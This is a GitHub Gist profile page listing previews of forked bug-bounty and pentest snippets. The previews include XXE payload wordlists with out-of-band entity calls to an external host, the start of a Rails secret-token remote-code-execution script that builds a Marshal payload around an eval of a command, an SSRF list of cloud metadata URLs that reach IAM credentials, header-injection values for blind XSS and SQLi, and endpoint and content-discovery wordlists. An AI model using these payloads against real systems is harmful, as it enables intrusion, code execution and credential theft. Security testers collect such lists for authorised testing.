Skip to content

Instantly share code, notes, and snippets.

View hvvvva's full-sized avatar
🎯
Focusing

hvvva hvvvva

🎯
Focusing
28 followers · 210 following
View GitHub Profile
@hvvvva
hvvvva / iframe-listener.js
Created December 5, 2022 14:43 — forked from mladenp/iframe-listener.js
iframe URL redirect listener
function iframeURLChange(iframe, callback) {
var unloadHandler = function () {
// Timeout needed because the URL changes immediately after
// the `unload` event is dispatched.
setTimeout(function () {
callback(iframe.contentWindow.location.href);
}, 0);
};
function attachUnload() {
@hvvvva
hvvvva / xxe-payloads.txt
Created November 29, 2020 02:35 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@hvvvva
hvvvva / rails-secret-token-rce.rb
Created October 31, 2020 02:49 — forked from rootxharsh/rails-secret-token-rce.rb
Rails Secret Token RCE.
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +
@hvvvva
hvvvva / XXE_payloads
Created April 26, 2020 03:08 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@hvvvva
hvvvva / ejs.sh
Created April 18, 2020 11:54 — forked from gwen001/ejs.sh
onliner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
function ejs() {
curl -L -k -s "$1" | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
}
Debug mode (recommended):
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))pr
@hvvvva
hvvvva / cloud_metadata.txt
Created March 11, 2020 03:29 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@hvvvva
hvvvva / headersPentest
Created March 11, 2020 03:27 — forked from momenbasel/headersPentest
HTTP headers is the language that all web servers speaks, it can be golden gem for security researcher.
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Scheme
Origin: null
Origin: [siteDomain].attacker.com
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
---For injecting BXSS(blind XSS) || SQLI payloads---
@hvvvva
hvvvva / waybackurls.py
Created June 19, 2019 05:51 — forked from mhmdiaa/waybackurls.py
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@hvvvva
hvvvva / all.txt
Created June 18, 2019 13:06 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@hvvvva
hvvvva / content_discovery_nullenc0de.txt
Created June 6, 2019 00:46 — forked from nullenc0de/content_discovery_nullenc0de.txt
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0